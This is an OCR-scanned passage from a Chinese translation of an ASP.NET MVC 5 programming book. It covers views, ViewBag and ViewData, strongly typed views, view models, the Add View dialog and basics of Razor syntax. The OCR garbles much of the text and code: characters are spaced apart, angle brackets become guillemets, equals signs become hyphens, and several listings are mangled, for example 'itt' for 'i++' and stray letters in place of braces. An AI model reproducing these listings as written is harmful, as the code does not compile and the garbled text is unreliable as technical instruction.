Learn more &raquo;</a></p> 
</div> 
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«div class="row"> 
«div class-"col-md-4"» 

«h2»Getting started«/h2» 

«p» 
ASP.NET MVC gives you a powerful, patterns-based way 
to build dynamic websites that enables a clean separation 
of concerns and gives you full control over markup 
for enjoyable, agile development. 

«/p» 

<p><a class="btn btn-default" 
href-"http://go.microsoft.com/fwlink/?LinkId-301865"» 
Learn more &raquo;«/a» 

«/p» 
«/div» 
«div class-"col-md-4"» 

<h2>Get more libraries«/h2» 

«p»NuGet is a free Visual Studio extension that makes it easy 
to add, remove, and update libraries and tools in 
Visual Studio projects.«/p» 

<p><a class="btn btn-default" 
href-"http://go.microsoft.com/fwlink/?LinkId-301866"» 
Learn more &raquo;«/a» 

</p> 

</div> 
<div class="col-md-4"> 

<h2>Web Hosting</h2> 

<p>You can easily find a web hosting company that offers the 
right mix of features and price for your applications. 

</p> 

<p><a class="btn btn-default" 
href-"http://go.microsoft.com/fwlink/?LinkId-301867"» 
Learn more &raquo; </a> 

</p> 

</div> 
</div> 


除了 顶部 设置 页 面 标题 的 少量 代码 ， 这 就 是 标准 的 HIML。 程 序 清单 3-2 显 示 了 引发 此 视 
图 的 控制 器 。 


程序 清单 3-2 Home Index 方 法 一 HomeController.cs 


public ActionResult Index() { 
return View(); 
} 


浏览 到 网 站 的 根 目录 (如 图 3-1 所 示 )， 结 果 毫 不 奇怪 :HomeController 的 Index 方 法 泻 染 了 


Home Index 视 图 , 也 就 是 将 前 一 个 视图 的 HTML 内 容 封装 到 由 站 点 布局 (本 章 稍 后 将 介绍 布局 ) 
提供 的 页 面 Header 和 Footer 部 分 得 到 的 结果 。 


En onerare 


ASP.NET 


ASP.NET is a free web framework for building great Web sites and Web applications 
using HTML, CSS and JavaScript. 


Leam more » 


Getting started Get more libraries Web Hosting 


ASP.NET MVC gives you a powerful patiems-  NuGet is a free Visual Studio extension that You can easily find a web hosting company 
based way lo build dynamic websites that makes it easy to add, remove, and update. nat offers ne right mix of features and price. 
enables a clean separation of concems and libraries and tools in Visual Studio projects. tor your applications. 

gives you fuli contro! over markup for 

enjoyable, agie development Leam more > Leam more » 


Leam more » 
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图 3-1 


这 个 例子 十 分 基础 -一 在 最 简单 的 情况 中 ， 向 控制 器 发 出 一 个 请 求 ， 控 制 器 返回 一 个 视 
图 ， 其 实 就 是 一 些 静态 的 HTML。 很 容易 ， 但 是 动态 性 不 好 。 前 面 说 过 ， 视 图 提供 了 一 个 模 
板 引擎 。 下 面 我 们 就 利用 这 个 模板 引擎 ， 从 控制 器 向 视图 传递 少量 数据 。 最 简单 的 方法 就 是 
使 用 ViewBag。ViewBag 具 有 局 限 性 ， 但 是 如 果 只 是 向 视图 传递 少量 数据 ， 它 还 是 很 有 用 的 。 
看 看 HomeController cs 中 的 About 操 作 方 法 ， 如 程序 清单 3-3 所 示 。 


程序 清单 3-3 Home About 方 法 一 HomeController.cs 


public ActionResult About () 


{ 
ViewBag.Message = "Your application description page."; 


return View(); 
} 


这 与 前 面 的 Index 方 法 几乎 相同 ， 但 是 注意 控制 器 将 ViewBag.Message 属 性 值 设置 成 一 个 
字符 串 ， 然 后 再 调用 return View0。 现 在 看 看 对 应 的 视图 ， 也 就 是 /Views/Home/About.cshtml。 
如 程序 清单 3-4 所 示 。 


程序 清单 3-4 Home About 视 图 一 一 About.cshtml 


@{ 

ViewBag.Title = "About"; 
} 
<h2>@ViewBag.Title.</h2> 
<h3>@ViewBag.Message</h3> 


<p>Use this area to provide additional information.</p> 
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这 个 视图 很 简单 ， 它 将 页 面 标题 设置 为 ViewBag.Title， 然 后 在 标题 标签 中 显示 ViewBag. 
Titlefll ViewBag.Message. 两 个 ViewBag 值 前 面 的 @ 字 符 是 本 章 后 面 将 会 学 习 的 Razor 语 法 中 最 
重要 的 部 分 : 它 告诉 Razor 视 图 引擎 ， 接 下 来 的 字符 是 代码 ， 不 是 HTMI 文 本 。 产 生 的 About 
视图 如 图 3-2 所 示 。 


| hap niocanost5235a/Homerabou P~ B C || i- About- My ASP.NET Appli.. * 


About. 


Your application description page. 


Use this area to provide additional information. 
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3.3 理解 视图 约定 


上 一 节 中 ， 通 过 一 些 例 子 演示 了 如 何 使 用 视图 来 泻 染 
HTML. 这 一 节 将 要 介绍 ASPNETMVC 如 何 找到 正确 的 视图 
进行 泻 染 ， 以 及 如 何 重 写 这 个 视图 ， 为 一 个 控制 器 操作 指定 
特定 的 视图 。 

本 章 到 现在 为 止 介绍 的 控制 器 操作 简单 地 调用 retum 
View() 来 泻 染 视图 ， 还 不 需要 指定 视图 的 文件 名 。 可 以 这 么 
做 ， 是 因为 它们 利用 了 ASPNET MVC 框 架 的 一 些 隐 式 约定 ， 
这 些 约定 定义 了 视图 选择 逻辑 。 

当 创 建新 的 项 目 模板 时 ， 将 会 注意 到 ， 项 目 以 一 种 非常 
具体 的 方式 包含 了 一 个 结构 化 的 Views 目 录 ( 如 图 3-3 所 示 )。 

在 每 一 个 控制 器 的 View 文 件 夹 中 ， 每 一 个 操作 方法 都 有 
一 个 同名 的 视图 文件 与 其 相对 应 。 这 就 提供 了 视图 与 操作 方 
法 关联 的 基础 。 

视图 选择 逻辑 在 /Views/ControllerName 目 录 ( 这 里 就 是 去 
掉 Controller 后 级 的 控制 器 名 ) 下 查找 与 操作 方法 同名 的 视图 。 
此 处 选择 的 视图 是 /Views/Home/Index.cshtml。 

与 ASPNET MVC 中 的 大 部 分 约定 设置 一 样 , 这 一 约定 是 
可 以 重 写 的 。 如果 想 让 Index 操 作 方 法 演 染 一 个 不 同 的 视图 ， 可 以 向 其 提供 一 个 不 同 的 视图 名 
称 ， 代 码 如 下 所 示 : 


public ActionResult Index() 
t 


a o-2Q8/5 +R 
h Solu (Cute P- 


return View("NotIndex"); 
} 


第 3 章 视 图 


这 样 编码 后 ， 虽 然 操作 方法 仍然 在 /Views/Home 目 录 中 查找 视图 ， 但 选择 的 不 再 是 
Index.cshtml， 而 是 NotIndex.cshtml。 然 而 ， 在 其 他 一 些 应 用 中 ， 我 们 可 能 需要 指定 完全 位 于 
不 同 目录 结构 中 的 视图 。 针 对 这 种 情况 ， 我 们 可 以 使 用 带 有 一 符号 的 语法 来 提供 视图 的 完整 
路 径 ， 代 码 如 下 所 示 : 

public ActionResult Index () 

t 


return View("-/Views/Example/Index.cshtml"); 
H 


注意 ， 为 了 在 查找 视图 时 避 开 视图 引擎 的 内 部 查找 机 制 ， 在 使 用 这 种 语法 时 ， 必 须 提 供 
视图 的 文件 扩展 名 。 


3.4 强 类 型 视图 


到 现在 为 止 ， 本 章 的 例子 都 十 分 简单 ， 通 过 ViewBag 向 视图 传递 少量 数据 。 尽 管 对 于 简 
单 的 情况 ， 使 用 ViewBag 很 容易 ， 但 是 处 理 实际 数据 时 ，ViewBag 就 变 得 不 方便 。 这 时 就 需要 
使 用 强 类 型 视图 。 下 面 就 进行 介绍 。 

我 们 首先 看 一 个 不 适合 使 用 ViewBag 的 例子 。 不 必 担 心 要 键入 这 些 代码 ， 它 们 只 是 用 来 
进行 说 明 的 。 


3.4.1 ViewBag 的 不 足 


假设 现在 需要 编写 一 个 显示 Album 实 例 列表 的 视图 。 一 种 简单 方法 就 是 将 专辑 添加 到 
ViewBag 中 ， 然 后 在 视图 中 迭代 它们 。 
例如 ， 控 制 器 操作 中 的 代码 可 能 与 下 面 代码 一 样 ， 如 下 所 示 : 


public ActionResult List() 
t 
var albums - new List«Album»(); 
for(int i = 0; i < 10; itt) ( 
albums.Add(new Album (Title = "Product " + i}); 
H 
ViewBag.Albums — albums; 
return View(); 


) 
BUS, PERR PRALER un. WA FRIR: 


<ul> 

@foreach (Album a in (ViewBag.Albums as IEnumerable<Album>)) ( 
<li>@a.Title</li> 

} 

</ul> 


注意 在 枚 举 之 前 需要 将 动态 的 ViewBag.Albums 转 换 为 IEnumerable<Album> 类 型 。 为 了 使 
视图 代码 干净 整洁 , 在 这 里 也 可 以 使 用 dynamic 关 键 字 , 但 是 当 访 问 每 个 Album 对 象 的 属性 时 ， 
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就 不 再 能 使 用 智能 感知 功能 。 


«ul» 

Gforeach (dynamic p in ViewBag.Albums) ( 
«li»8p.Title«/li» 

} 

</ul> 


如 果 既 能 获得 dynamic 下 的 简洁 语法 ， 又 能 获得 强 类 型 和 编译 时 检查 的 好 处 (比如 正确 地 
输入 属性 和 方法 名 称 )， 就 完美 了 。 可 喜 的 是 ， 强 类 型 视图 可 以 帮助 我 们 获得 这 些 。 强 类 型 视 
图 允许 设置 视图 的 模型 类 型 。 因 此 ， 我 们 可 以 从 控制 器 向 视图 传递 一 个 在 两 端 都 是 强 类 型 的 
模型 对 象 ， 从 而 获得 智能 感知 、 编 译 器 检查 等 好 处 。 在 Controller 方 法 中 , 可 以 通过 向 重 载 的 
View 方 法 中 传递 模型 实例 来 指定 模型 ， 代 码 如 下 所 示 : 


public ActionResult List() 

ds albums 
for (int I 
: albums.Add(new Album (Title = "Album " + i}); 
oid View (albums); 

) 


下 一 步 是 告知 视图 哪 种 类 型 的 模型 正在 使 用 @model 声 明 .注意 这 里 需要 输入 模型 类 型 的 
完全 限定 类 型 名 (名 称 空间 和 类 型 名 称 )， 如 下 所 示 : 


@model IEnumerable«MvcMusicStore.Models.Album» 

<ul> 

Gforeach (Album p in Model) { 
«li»8p.Titlec/li» 

H 

</ul> 


如 果 不 想 输入 模型 类 型 的 完全 限定 类 型 名 ， 可 使 用 @using 关 键 字 声明 ， 如 下 所 示 : 


Gusing MvcMusicStore.Models 

Gmodel IEnumerable«Album» 

«ul» 

Gforeach (Album p in Model) ( 
«li»(p.Title«/li» 

$ 

</ul> 


对 于 在 视图 中 经 常 使 用 的 名 称 空间 ， 一 个 较 好 的 方法 就 是 在 Views 目 录 下 的 web.config 文 
件 中 声明 。 


«system.web.webPages.razor» 


new List«Album»(); 
0; i« 10; i++) 


«pages pageBaseType-"System.Web.Mvc.WebViewPage"» 
«namespaces» 
«add namespace-"System.Web.Mvc" /» 
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«add namespace-"System.Web.Mvc.Ajax" /> 
«add namespace-"System.Web.Mvc.Html" /» 
«add namespace-"System.Web.Routing" /» 


<add namespace-"MvcMusicStore.Models" /> 
«/namespaces» 
«/pages» 
«/system.web.webPages.razor» 
为 了 查看 先前 的 两 个 例子 的 实际 应 用 ， 使 用 NuGet 将 Wrox.ProMvcS.Views.AlbumList £l 
安装 到 一 个 默认 的 ASPNET MVC 5 项 目 中 ， 如 下 所 示 : 


Install-Package Wrox.ProMvc5.Views.AlbumList 

这 样 就 把 两 个 视图 例子 放 进 了 文件 夹 \Views\Albums 中 , 并 且 把 相应 的 控制 器 代码 放 进 了 
文件 夹 \Samples\AlbumList 中 。 按 CtrltF5 快 捷 键 运 行 项 目 ， 在 浏览 器 中 访问 /albums/ 
listweaklytyped 和 /albums/liststronglytyped， 就 可 以 看 到 代码 的 运行 效果 。 


3.4. 理解 ViewBag、ViewData 和 ViewDataDictionary 


我 们 先 讨论 了 使 用 ViewBag 从 控制 器 向 视图 传递 信息 ， 然 后 介绍 了 传递 强 类 型 模型 。 现 
实 中 ， 这 些 值 都 是 通过 ViewDataDictionary 传 递 的 。 下 面 就 详细 进行 介绍 。 

从 技术 角度 讲 , 数据 从 控制 器 传送 到 视图 是 通过 一 个 名 为 ViewData 的 ViewDataDictionary (这 是 
一 个 特殊 的 字典 类 )。 我 们 可 以 使 用 标准 的 字典 语法 设置 或 读 取 其 中 的 值 ， 示 例如 下 : 


ViewData["CurrentTime"] = DateTime.Now; 


尽管 这 种 语法 现在 也 能 使 用 ， 但 是 ASPNET MVC 3 拥有 更 简单 的 语法 ， 它 利用 了 C# 4 的 
dynamic 关 键 字 。ViewBag 是 ViewData 的 动态 封装 器 。 这 样 我 们 就 可 以 按照 下 面 的 方式 来 设 
置 值 : 


ViewBag.CurrentTime = DateTime.Now; 


KE, ViewBag.CurrentTime^5 [E] T ViewData["CurrentTime"]. 

一 般 来 说 ， 我 们 将 遇 到 的 大 部 分 代码 使 用 ViewBag， 而 不 是 ViewData。 大 多 数 情况 下 ， 
这 两 种 语法 彼此 之 间 并 不 存在 真正 的 技术 差异 。ViewBag 相 对 于 字典 语法 而 言 仅 仅 是 一 种 受 
开发 人 员 欢 迎 的 、 看 上 去 很 好 看 的 语法 而 已 。 


ViewData 和 ViewBag 


注意 尽管 选择 一 种 语法 格式 并 不 比 选择 另 一 种 格式 具有 真正 的 技术 优势 ， 但 是 二 者 之 


间 的 一 些 关键 差异 还 是 需要 知道 的 。 

很 明显 的 一 个 差异 就 是 只 有 当 要 访问 的 关键 字 是 一 个 有 效 的 C# 标 识 符 时 ，ViewBag 才 起 
作用 。 例 如 ， 如 果 在 ViewData["Key With Spaces"] 中 存放 一 个 值 ， 那 么 就 不 能 使 用 ViewBag 访 
问 。 因 为 这 样 根本 就 无 法 通过 编译 。 

另 一 个 需要 知道 的 重要 差异 是 ， 动 态 值 不 能 作为 一 个 参数 传递 给 扩展 方法 。 因 为 CH 编译 
器 为 了 选择 正确 的 扩展 方法 ， 在 编译 时 必须 知道 每 一 个 参数 的 真正 类 型 。 

如 果 其 中 任何 一 个 参数 是 动态 的 , 那么 就 不 会 通过 编译 。 例如 ,这 行 代码 就 会 编译 失败 : 
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@Html.TextBox("name"，ViewBag.Name)。 要 使 这 行 代码 通过 编译 有 两 种 方法 : 第 一 是 使 用 
ViewData["Name"] ， 第 二 是 把 ViewData["Name"] 值 转换 为 一 个 具体 的 类 型 : 
(string)ViewBag.Name。 


如 刚才 所 述 ，ViewDataDictionary 是 一 个 特殊 的 字典 类 ， 而 并 不 只 是 一 个 通用 的 
Dictionary。 原 因 之 一 在 于 ， 它 有 一 个 额外 的 Model 属 性 ， 人 允许 向 视图 提供 一 个 具体 的 模型 对 
象 。 因 为 ViewData 中 只 能 有 一 个 模型 对 象 ， 所 以 使 用 ViewDataDictionary 向 视图 传递 具体 的 类 
十 分 方便 。 这 样 一 来 ， 视 图 就 可 以 指定 它 希 望 哪个 类 作为 模型 对 象 ， 从 而 让 我 们 能 够 利用 强 
类 型 。 


3.5 ”视图 模型 


视图 通常 需要 显示 各 种 没有 直接 映射 到 域 模型 的 数据 。 例如， 可 能 需要 视图 来 显示 单个 
商品 的 详细 信息 。 有 时 在 同一 视图 上 也 需要 显示 商品 附带 的 其 他 信息 ， 比 如 当前 登录 系统 的 
用 户 名 、 该 用 户 是 否 有 权 编 辑 商 品 等 。 

把 与 视图 主 模型 无 关 的 数据 存放 在 ViewBag 属 性 中 ， 可 以 很 容易 地 实现 这 些 数据 在 视图 
中 的 显示 。 当 具有 一 个 清晰 定义 的 模型 和 一 些 额外 的 引用 数据 时 ， 这 种 方法 万 为 有 用 。 这 种 
技术 的 一 种 常见 的 应 用 是 使 用 ViewBag 为 下 拉 列 表 提 供 表单 选项 。 例 如 ，MVC Music Store 项 
目的 Album Edit 视 图 需要 填充 Genres 和 Albums 下 拉 列 表 ， 但 是 这 些 列 表 不 适合 放 到 Albums 模 
型 中 。 为 了 应 对 这 种 情况 ， 同 时 不 使 用 无 关 信息 影响 Album 模 型 ， 我 们 可 以 将 Genre 和 Album 
的 信息 保存 到 ViewBag 中 ， 如 程序 清单 3-5 所 示 。 


程序 清单 3-5 ”通过 ViewBag 填 充 下 拉 列 表 


// 
// GET: /StoreManager/Edit/5 


public ActionResult Edit(int id = 0) 
t 
Album album - db.Albums.Find(id); 
if (album -- null) 
t 
return HttpNotFound(); 
k 
ViewBag.GenreId = new SelectList( 
db.Genres, "GenreId", "Name", album.GenreId); 
ViewBag.ArtistId = new SelectList( 
db.Artists, "ArtistId", "Name", album.ArtistId); 
return View (album); 
} 


这 么 做 当然 能 够 完成 要 求 ， 并 且 也 为 在 视图 中 显示 数据 提供 了 一 种 灵活 的 方法 。 但 是 这 
并 不 是 一 种 应 该 经 常 使 用 的 方法 。 由 于 前 面 介绍 过 的 原因 ， 一 般 应 该 坚持 使 用 强 类 型 模型 对 
象 一 -必须 使 所 有 数据 都 是 强 类 型 数据 ， 以 便 视图 编写 人 员 能 够 利用 智能 感知 功能 。 

可 能 采用 的 一 个 方法 是 编写 自 定义 的 视图 模型 类 。 这 里 的 视图 模型 可 以 看 成 仅 限于 向 视 
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图 提供 信息 的 模型 。 注意 这 里 使 用 的 术语 “视图 模型 "不同 于 Model View ViewModel (MVVM) 
模式 中 视图 模型 的 概念 。 这 也 是 当 在 讨论 视图 模型 时 , 作者 倾向 于 使 用 术语 “视图 特定 模型 ” 
的 原因 所 在 。 
例如 ， 如 果 需 要 一 个 购物 车 汇总 页 面 ， 用 来 显示 商品 列表 、 购 物 车 中 商品 的 总 金额 以 及 
显示 给 用 户 的 消息 ， 就 可 以 创建 ShoppingCartViewModel 类 ， 如 下 所 示 : 
public class ShoppingCartViewModel ( 
public IEnumerable«Product» Products ( get; set; } 
public decimal CartTotal ( get; set; } 


public string Message ( get; set; } 
) 


现在 可 使 用 如 下 的 @model 指 令 ， 向 这 个 模型 中 强制 性 地 输入 一 个 视图 : 
@model ShoppingCartViewModel 


这 就 在 不 需要 改变 Model 类 的 情况 下 带 来 了 强 类 型 视图 的 益处 ， 其 中 包括 类 型 检查 、 智 
能 感知 以 及 免 于 转换 无 类 型 的 ViewDataDictionary 对 象 。 
下 面 看 一 个 购物 车 视图 模型 的 例子 ， 在 NuGet 中 运行 下 面 的 命令 : 


Install-Package Wrox.ProMvc5.Views.ViewModel 


这 个 NuGet 包 在 项 目 中 添加 一 个 Samples 目录， 其 中 包含 ProductModel 和 
ShoppingCartViewModel， 以 及 用 于 显示 它们 的 ShoppingCartController。 要 查看 其 输出 ， 运 行 
应 用 程序 并 浏览 到 /ShoppingCart。 

前 面 几 节 介 绍 了 一 些 视图 模型 相关 的 概念 。 下 一 章 将 更 详细 地 介绍 模型 。 


3.6 ”添加 视图 


3.2 节 和 3.3 节 介绍 了 控制 器 指定 视图 的 基本 原理 。 但 是 如 何 创建 视图 呢 ? 虽然 可 以 手动 
创建 视图 文件 ， 然 后 把 它 添 加 到 Views 目 录 下 ， 但 是 Visual Studio 中 的 ASPNET MVC 工 具 的 
Add View 对 话 框 使 得 创建 视图 非常 容易 。 

显示 Add View 对 话 框 最 简单 的 方法 就 是 在 操作 方法 上 右 击 。 使 用 任何 操作 方法 都 可 以 ; 
在 这 个 例子 中 ， 我 们 首先 添加 一 个 新 的 名 为 Edit 的 操作 方法 ， 然 后 使 用 Add View 对 话 框 为 其 
创建 一 个 视图 。 开 始 时 ， 在 MVC 5 应 用 程序 的 HomeController 控 制 器 中 添加 Edit 操 作 方 法 ， 方 
法 中 包含 如 下 代码 : 

public ActionResult Edit() 

{ 


return View(); 
} 


下 一 步 , 在 操作 方法 中 右 击 , 选择 Add View 菜 单项 , 打开 Add View 对 话 框 , 如 图 3-4 所 示 。 
打开 的 Add View 对 话 框 如 图 3-5 所 示 。 
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public Actionfesult Edit() 
return View(); 
z EET CoM CoteG 
} B addvew- 
Refactor 
Organize Usings + 


Generate Sequence Diagram. 


图 3-4 


View rame: 
Edit 

Template 
Empty (without model) 


View options: 
[7] Crete as a partial view 
Reference script ore 


(V. Use a layout page 


(Leave empty if it is set in a Razor viewstart file) 


图 3-5 


下 面 的 列表 对 每 一 个 菜单 项 进行 了 详细 描述 : 

e View name: 当 从 一 个 操作 方法 的 上 下 文中 打开 这 个 对 话 框 时 ， 视 图 的 名 称 默认 被 
填充 为 操作 方法 的 名 称 。 视 图 的 名 称 是 必须 有 的 。 

e Template: 一 旦 选择 一 个 模型 类 型 ， 就 可 以 选择 一 个 基 架 模板 。 这 些 模板 利用 Visual 
Studio 模板 系统 来 生成 基于 选择 模型 类 型 的 视图 。 图 3-6 显示 了 这 些 模板 ， 其 描述 如 
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表 3-1 所 示 。 
表 3-1 视图 基 架 类 型 
E R [NES 

Create 创建 一 个 视图 ， 其 中 带 有 创建 模型 新 实例 的 表单 ， 并 为 模型 类 型 的 每 一 个 属性 生成 
一 个 标签 和 输入 杠 

Delete 创建 一 个 视图 ， 其 中 带 有 删除 现 有 模型 实例 的 表单 ， 并 为 模型 的 每 一 个 属性 显示 一 
个 标签 以 及 当前 该 属性 的 值 

Details 创建 一 个 视图 ， 它 显示 了 模型 类 型 的 每 一 个 属性 的 标签 及 其 相应 值 

Edit 创建 一 个 视图 ， 其 中 带 有 编辑 现 有 模型 实例 的 表单 ， 并 为 模型 类 型 的 每 一 个 属性 生 
成 一 个 标签 和 输入 杠 

Empty 创建 一 个 空 视图 ， 使 用 @model 语 法 指定 模型 类 型 

Empty(without 与 Empty 基 架 一 样 创 建 一 个 空 视图 。 但 是 ， 由 于 这 个 基 架 没有 模型 ， 因 此 在 选择 此 

model) 基 架 时 不 需要 选择 模型 类 型 。 这 是 唯一 不 需要 选择 模型 类 型 的 一 个 基 架 类 型 

List 创建 一 个 带 有 模型 实例 表 的 视图 。 为 模型 类 型 的 每 一 个 属性 生成 一 列 。 确 保 操作 方 


法 向 视图 传递 的 是 IEnumerable<YourModelType> 类 型 。 同 时 为 了 执行 创建 /编辑 / 删 
除 操作 ， 视 图 中 还 包含 了 指向 操作 的 链接 
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(Leave empty i itis set in a Razor viewstart file) 


图 3-6 


e Reference script libraries: 这 个 选项 用 来 指示 要 创建 的 视图 是 否 应 该 包含 指向 
JavaScript 库 ( 如 果 对 视图 有 意义 的 话 ) 的 引用 。 默 认 情 况 下 ，_Layout.cshtml 文件 既 不 
引用 jQuery Validation 库 ， 也 不 引用 Unobtrusive jQuery Validation 库 ， 只 引用 主 
jQuery 库 。 

当 创 建 一 个 包含 数据 条 目 表 单 的 视图 (如 Edit 视图 或 Create 视图 ) 时 , 选择 这 个 选项 会 
添加 对 jqueryval 捆绑 的 脚本 引用 。 如 果 要 实现 客户 端 验证 ， 那 么 这 些 库 就 是 必需 的 。 
除 这 种 情况 以 外 ， 完 全 可 以 忽略 这 个 复 选 框 。 


(D) iE 由 于 是 由 特定 的 视图 基 架 T4 模 板 完 全 控制 这 个 复 选 框 的 行为 ， 因 此 
对 于 自 定义 的 视图 基 某 模板 和 黄 他 视图 引擎 来 说 它 会 有 所 不 同 . 


e Create as a partial view: 选择 这 个 选项 意味 着 要 创建 的 视图 不 是 一 个 完整 的 视图 
因此 ，Layout 选项 是 不 可 用 的 。 生 成 的 部 分 视图 除了 在 其 顶部 没有 <html> 标 签 和 
<head> 标 签 之 外 ， 很 像 一 个 常规 的 视图 。 

e Use a layout page: 这 个 选项 决定 了 要 创建 的 视图 是 否 引用 布局 ， 还 是 成 为 一 个 完全 
独立 的 视图 。 如 果 选 择 使 用 默认 布局 ， 就 没 必要 指定 一 个 布局 了 ， 因 为 在 
_ViewStart.cshtml 文件 中 已 经 指定 了 布局 。 这 个 选项 是 用 来 重 写 默 认 布局 文件 的 。 


自 定义 基 架 视图 


正如 本 节 提 到 ， 基 架 视图 是 使 用 T4 模 板 生 成 的 。 我 们 可 以 自 定义 已 有 的 模板 和 添加 新 模 
板 ， 这 些 内 容 在 第 16 章 会 进行 详细 介绍 。 

当 我 们 使 用 模型 时 ，Add View 对 话 框 就 会 变 得 有 趣 。 第 4 章 将 会 看 到 这 一 点 ， 该 章 将 介 
绍 如 何 使 用 前 面 介绍 的 视图 基 架 类 型 来 构建 模型 和 创建 基 架 视图 。 


37 ”Razor 视图 引擎 


面 的 部 分 介绍 了 如 何在 控制 器 中 指定 视图 以 及 如 何 添加 视图 。 然 而 这 些 内 容 并 没有 涉 


前 


47 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


及 在 视图 中 执行 的 语法 。 ASPNET MVC 提供 了 两 种 不 同 的 视图 引擎 : 较 新 的 Razor 视 图 引擎 
和 较 早 的 Web Forms 视 图 引擎 。 本 节 只 介绍 Razor 视 图 引擎 ， 其 中 包括 Razor 语 法 、 布 局 和 部 分 
视图 等 。 


3.7.4 ”Razor 的 概念 


Razor 视 图 引擎 是 ASPNET MVC 3 中 新 扩展 的 内 容 ， 并 且 也 是 它 的 默认 视图 引擎 。 本 章 
主要 介绍 Razor 视 图 引擎 ， 对 Web Forms 视 图 引擎 不 做 介绍 。 

Razor 是 ASPNET MVC 特 性 团队 对 收 到 的 最 强烈 请 求 之 一 回应 的 产物 ， 该 请 求 建议 提供 
一 个 干净 的 、 轻 量 级 的 、 简 单 的 视图 引擎 ,不 要 包含 原 有 Web Forms 视 图 引擎 的 “语法 累 效 ”。 
许多 开发 人 员 认 为 编写 视图 所 带 来 的 语法 噪音 给 读 取 视图 造成 了 阻碍 。 

在 ASPNETMVC 3 中 ， 新 引入 的 Razor 视 图 引擎 最 终 满 足 了 这 一 请 求 。 

Razor 为 视图 表示 提供 了 一 种 精简 的 语法 ， 最 大 限度 地 减少 了 语法 和 额外 的 字符 。 这 样 就 
有 效 地 减少 了 语法 障碍 , 并 且 在 视图 标记 语言 中 也 没有 新 的 语法 规则 。 许多 编写 Razor 视 图 的 
开发 人 员 都 觉得 视图 代码 的 编写 非常 流畅 。 在 Visual Studio 中 又 为 Razor 添 加 了 一 流 的 智能 感 
知 功能 ， 从 而 使 得 这 种 感觉 更 加 明显 。 

Razor 通 过 理解 标记 的 结构 来 实现 代码 和 标记 之 间 尽 可 能 顺畅 地 转换 。 下 面 的 一 些 例子 会 
帮助 理解 这 一 点 。 下 面 的 这 个 例子 演示 了 一 个 包含 少量 视图 逻辑 的 简单 Razor 视 图 : 

er 


// this is a block of code. For demonstration purposes, 
// we'll create a "model" inline. 


var items = new string[] ("one", "two", "three"); 
) 
«html» 
Xhead»«title»Sample View«c/title»«/head» 
«body» 
«hl»Listing G(items.Length items.«/hl» 
«ul» 


@foreach (var item in items) ( 
«li»The item name is G8item.«/li» 
) 
«/ul» 
</body> 
</html> 


上 面 的 代码 示例 采用 了 C# 语 法 ， 这 将 意味 着 这 个 文件 的 扩展 名 是 .cshtml。 同 理 ， 使 用 
Visual Basic 语 法 的 Razor 视 图 的 扩展 名 将 是 .vbhtml。 这 些 文件 扩展 名 很 重要 , 因为 它们 指出 了 
Razor 语 法 分 析 器 的 编码 语言 的 语法 。 


不 要 过 多 地 考虑 
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下 面 详细 深入 地 介绍 Razor 的 语法 机 制 。 在 这 之 前 ， 强 烈 建议 记 住 : Razor 的 设计 理念 是 
简单 直观 。 对 于 大 多 数 应 用 ， 我 们 不 必 关 心 Razor 语 法 一 一 只 需要 在 插入 代码 时 ， 输 入 HTML 
和 @ 符 号 。 

如 果 刚 刚 接触 ASPNET MVC， 可 以 先 跳 过 本 章 剩余 内 容 ， 以 后 再 回 过 头 来 阅读 。 因 为 通 
常 认为 将 视图 中 的 逻辑 量 降 到 最 少 是 一 种 很 好 的 实践 做 法 ， 所 以 即使 对 于 复杂 的 网 站 ， 一 般 
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来 说 对 Razor 有 基本 的 理解 也 就 足够 了 。 
3.72 ”代码 表达 式 


Razor 中 的 核心 转换 字符 是 “at” 符 号 (@)。 这 个 单一 字符 用 做 标记 -代码 的 转换 字符 ， 有 
时 也 反 过 来 用 做 代码 -标记 的 转换 字符 。 这 里 共有 两 种 基本 类 型 的 转换 : 代码 表达 式 和 代码 块 。 
求 出 表达 式 的 值 ， 然 后 将 值 写 入 到 响应 中 。 

例如 ， 在 下 面 的 代码 段 中 : 


<hl>Listing @items.Length items .</h1> 


注意 ， 表 达 式 @stu 作 Length 是 作为 隐 式 代码 表达 式 求解 的 ， 然 后 在 输出 中 显示 表达 式 的 
值 3。 需 要 注意 的 一 点 是 ， 这 里 不 需要 指出 代码 表达 式 的 结束 位 置 。 相 比 之 下 ，Web Forms 视 图 
只 支持 显 式 代码 表达 式 ， 这 样 上 面 的 代码 段 将 是 如 下 形式 : 


<hl>Listing «$: stuff.Length $» items.«/hl» 


Razor 十 分 智能 ， 可 以 知道 表达 式 后 面 的 空格 字符 不 是 一 个 有 效 的 标识 符 ， 所 以 它 可 以 
顺畅 地 转 回 到 标记 语言 。 

注意 ， 在 无 序列 表 中 ，@item 代 码 表达 式 后 面 的 字符 是 一 个 有 效 的 代码 字符 。 但 是 Razor 是 
如 何 知道 表达 式 后 面 的 点 不 是 引用 当前 表达 式 的 属性 或 方法 的 呢 ? 原 来 Razor 是 在 点 字符 处 
向 后 帘 看 ， 看 到 了 一 个 尖 括 号 ， 因 此 知道 这 不 是 一 个 有 效 的 标识 符 ， 所 以 会 转 回 标记 模式 。 
所 以 ， 第 一 个 列表 项 将 泻 染 成 : 

<li>The item name is one.«/li» 

Razor 自 动 从 代码 转 回 标记 的 能 力 是 其 广 受 欢迎 的 一 个 方面 ， 也 是 其 保持 语法 简洁 干净 
的 秘方 。 但 是 这 样 也 带 来 了 一 些 问题 , 代码 可 能 会 出 现 潜在 的 二 义 性 。 例如 以 下 的 Razor 片 段 : 


er 

string rootNamespace - "MyApp"; 
} 
<span>@rootNamespace.Models</span> 


在 这 个 示例 中 ， 想 要 的 输出 结果 是 : 
<span>MyApp .Models</span> 
然而 ， 这 样 反而 出 现 了 错误 ， 提 示 string 没 有 Models 属 性 。 在 这 种 边界 情况 下 ，Razor 诚 


然 不 能 理解 我 们 的 意图 ， 而 会 认为 @rootNamespace Models 是 代码 表达 式 。 幸 亏 Razor 还 可 以 
通过 将 表达 式 用 圆 括号 括 起 来 以 支持 显 式 代 码 表达 式 : 


«span»6 (rootNamespace) .Models«/span» 


这 样 就 告知 了 Razor，.Models 是 字面 量 文本 ， 而 不 是 代码 表达 式 的 一 部 分 。 
既然 现在 是 在 介绍 代码 表达 式 , 就 应 该 了 解 一 下 显示 一 个 电子 邮件 地 址 时 的 情况 。 例如 ， 
考虑 下 面 的 邮件 地 址 是 : 


<span>support@megacorp.com</span> 
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乍 看 之 下 ， 这 可 能 会 出 现 错误 ， 因 为 @megacorp.com 看 起 来 像 是 一 个 企图 打印 出 变量 
